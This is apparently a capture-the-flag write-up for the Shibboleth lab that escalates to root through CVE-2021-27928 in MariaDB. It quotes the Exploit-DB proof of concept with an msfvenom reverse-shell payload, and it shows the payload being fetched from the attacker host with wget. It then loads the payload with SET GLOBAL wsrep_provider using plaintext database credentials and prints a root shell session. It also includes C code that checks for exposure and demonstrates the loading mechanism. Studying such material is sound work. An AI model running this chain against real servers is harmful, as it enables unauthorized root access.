CVE-2021-27928
A vulnerability classified as critical has been found in MariaDB up to 10.2.36/10.3.27/10.4.17/10.5.8 (database software). It is an untrusted search path vulnerability, CWE-426: the application searches for critical resources using an externally supplied search path that can point to resources not under the application's direct control. Here the externally supplied path is the wsrep_provider (or wsrep_notify_cmd) server variable; a database user holding the SUPER privilege can set it to a file of their choosing, and the server loads or executes that file with the privileges of the mysqld process. Confidentiality, integrity and availability are all impacted.
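Two offline checks a reviewer would want before calling a server exploitable, as an added example that is not part of the page, the Exploit-DB entry or MariaDB itself: whether the reported version is below the first fixed release of its series (10.2.37, 10.3.28, 10.4.18, 10.5.9), and whether the account's SHOW GRANTS line carries the SUPER privilege that SET GLOBAL requires (SUPER is a global privilege, so only an `ON *.*` grant can hold it). The version strings and GRANT lines in the block are constructed for the demonstration; the function names are mine.

```c
/* Added example (not from the page or from MariaDB): two offline checks for
 * CVE-2021-27928 exposure.
 * 1) Is the MariaDB version below the fixed release of its series?
 * 2) Does the account's grant line give SUPER (directly or via ALL PRIVILEGES)
 *    at global scope, which SET GLOBAL wsrep_provider needs?
 * Sample version strings and GRANT lines are constructed for the demo. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

struct fixed_release { int major, minor, patch; };

/* First fixed release of each affected series, per the advisory text. */
static const struct fixed_release FIXED[] = {
    {10, 2, 37}, {10, 3, 28}, {10, 4, 18}, {10, 5, 9},
};

/* Returns 1 if the version is in an affected series and below its fix,
 * 0 if fixed or not in a listed series (e.g. a MySQL 5.7 string),
 * -1 if the string cannot be parsed.
 * Accepts the usual "10.5.8-MariaDB-1:10.5.8+maria~focal" form. */
int mariadb_version_affected(const char *version)
{
    int major, minor, patch;
    if (sscanf(version, "%d.%d.%d", &major, &minor, &patch) != 3)
        return -1;
    for (size_t i = 0; i < sizeof FIXED / sizeof FIXED[0]; i++) {
        if (FIXED[i].major == major && FIXED[i].minor == minor)
            return patch < FIXED[i].patch;
    }
    return 0;
}

/* Returns 1 if a SHOW GRANTS line gives the account SUPER (directly or via
 * ALL PRIVILEGES) on *.*, 0 if not, -1 if the line is malformed. */
int grant_allows_set_global(const char *grant_line)
{
    char upper[512];
    size_t n = strlen(grant_line);
    if (n >= sizeof upper)
        return -1;
    for (size_t i = 0; i < n; i++)
        upper[i] = (char)toupper((unsigned char)grant_line[i]);
    upper[n] = '\0';

    const char *on = strstr(upper, " ON ");
    if (!on || strncmp(upper, "GRANT ", 6) != 0)
        return -1;
    /* SUPER cannot be granted on a database or table, so a scoped grant
     * such as "ON `zabbix`.*" never allows SET GLOBAL. */
    if (strncmp(on, " ON *.*", 7) != 0)
        return 0;

    /* Only the privilege list before " ON " matters; the user name after
     * it could itself contain the word SUPER. */
    char privs[512];
    size_t plen = (size_t)(on - upper);
    memcpy(privs, upper, plen);
    privs[plen] = '\0';
    return (strstr(privs, "ALL PRIVILEGES") || strstr(privs, "SUPER")) ? 1 : 0;
}

/* Exploitable only when the server is unpatched AND the account can run
 * SET GLOBAL; either condition alone is not enough. */
int exploitable(const char *version, const char *grant_line)
{
    return mariadb_version_affected(version) == 1 &&
           grant_allows_set_global(grant_line) == 1;
}

int main(void)
{
    /* Constructed samples. */
    const char *v_old   = "10.4.17-MariaDB-1:10.4.17+maria~focal";
    const char *v_fixed = "10.4.18-MariaDB";
    const char *g_super  = "GRANT ALL PRIVILEGES ON *.* TO 'zabbix'@'localhost'";
    const char *g_scoped = "GRANT ALL PRIVILEGES ON `zabbix`.* TO 'zabbix'@'localhost'";
    printf("old version, global ALL PRIVILEGES: %d\n", exploitable(v_old, g_super));
    printf("old version, db-scoped grant:       %d\n", exploitable(v_old, g_scoped));
    printf("fixed version, global grant:        %d\n", exploitable(v_fixed, g_super));
    return 0;
}
```

Feed it the output of `SELECT VERSION();` and `SHOW GRANTS;` from the account you hold. A database-scoped grant, however broad, is a dead end for this CVE: the exploit on this page works only because the zabbix account can run SET GLOBAL.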
Exploit
┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/CVE-2021-27928]
└─$ searchsploit -m linux/local/49765.txt ; mv 49765.txt CVE-2021-27928.txt
Exploit: MariaDB 10.2 - 'wsrep_provider' OS Command Execution
URL: https://www.exploit-db.com/exploits/49765
Path: /usr/share/exploitdb/exploits/linux/local/49765.txt
Codes: CVE-2021-27928
Verified: False
File Type: ASCII text
Copied to: /home/kali/archive/htb/labs/shibboleth/CVE-2021-27928/49765.txt
┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/CVE-2021-27928]
└─$ cat CVE-2021-27928.txt
# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928
# Proof of Concept:
# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so
# Start a listener
nc -lvp <port>
# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
The step-by-step exploit is available at Exploit-DB.
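What msfvenom's `-f elf-so` output does under the hood is an ELF constructor, so the following hand-written shared object shows the mechanism the SET GLOBAL step relies on. This is an added example, not code from the page, the Exploit-DB entry or MariaDB: mysqld dlopen()s the path given in wsrep_provider to initialise the Galera provider, and the dynamic loader runs every constructor in the object as part of dlopen(), before mysqld looks up any provider entry point. The marker path, the benign action taken in the constructor and the function names are assumptions for the demonstration; msfvenom's payload would start the reverse shell at that point instead.

```c
/* Added example (not from the page, Exploit-DB or MariaDB): a stand-in for
 * the msfvenom "-f elf-so" payload that shows why SET GLOBAL wsrep_provider
 * executes code. Build as a shared object:
 *     gcc -shared -fPIC -o CVE-2021-27928.so wsrep_poc.c
 * When a SUPER user runs SET GLOBAL wsrep_provider='/path/CVE-2021-27928.so',
 * mysqld dlopen()s the file; dlopen() runs on_load() before returning, inside
 * mysqld and with mysqld's privileges. Because the file is not a real wsrep
 * provider the SET fails afterwards (or the client loses its connection),
 * but by then the constructor has already run. Compiled into a normal
 * executable the same constructor runs before main(), which is how the
 * accessors below can be exercised without mysqld. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#ifndef WSREP_POC_MARKER
#define WSREP_POC_MARKER "/tmp/wsrep_poc_marker"   /* assumed path for the demo */
#endif

static int g_constructor_ran = 0;
static int g_uid_at_load = -1;

/* Runs at load time: during dlopen() for a .so, at process start for an
 * executable. This is the hook the reverse-shell payload sits in. */
__attribute__((constructor))
static void on_load(void)
{
    g_constructor_ran = 1;
    g_uid_at_load = (int)geteuid();

    /* Benign stand-in for the payload: record which process loaded us and
     * as whom. Loaded by mysqld on a box like Shibboleth this shows euid=0. */
    FILE *f = fopen(WSREP_POC_MARKER, "w");
    if (f) {
        fprintf(f, "loaded by pid=%ld euid=%d\n", (long)getpid(), g_uid_at_load);
        fclose(f);
    }
}

/* Accessors so a caller can confirm the constructor fired without
 * inspecting the file system. */
int wsrep_poc_constructor_ran(void) { return g_constructor_ran; }
int wsrep_poc_uid_at_load(void)     { return g_uid_at_load; }

int main(void)
{
    printf("constructor ran: %d, euid at load: %d\n",
           wsrep_poc_constructor_ran(), wsrep_poc_uid_at_load());
    return 0;
}
```

Nothing in the object has to match the wsrep provider API for the constructor to fire, which is why a generic msfvenom shared object works here; the same property is what makes a file-system check for "does this .so export the expected symbols" useless as a defence, and why the fix restricts who can change the variable rather than what the file looks like.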
Exploitation
ipmi-svc@shibboleth:/dev/shm$ wget -q http://10.10.14.7/CVE-2021-27928/CVE-2021-27928.so
The payload has been delivered to the /dev/shm directory on the target over HTTP, from a web server on the attacking host (10.10.14.7).
ipmi-svc@shibboleth:/dev/shm$ mysql -uzabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so";'
Executing the exploit command with the zabbix database credentials. SET GLOBAL requires the SUPER privilege, so this only works because the zabbix account holds it; the shell that follows arrives as root because mysqld runs as root on this host.
┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/CVE-2021-27928]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.124] 45528
whoami
root
hostname
shibboleth
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.124 netmask 255.255.255.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:967b prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:967b prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:96:7b txqueuelen 1000 (Ethernet)
RX packets 19954 bytes 6507332 (6.5 MB)
RX errors 0 dropped 46 overruns 0 frame 0
TX packets 21093 bytes 6714736 (6.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 190629 bytes 18092849 (18.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 190629 bytes 18092849 (18.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise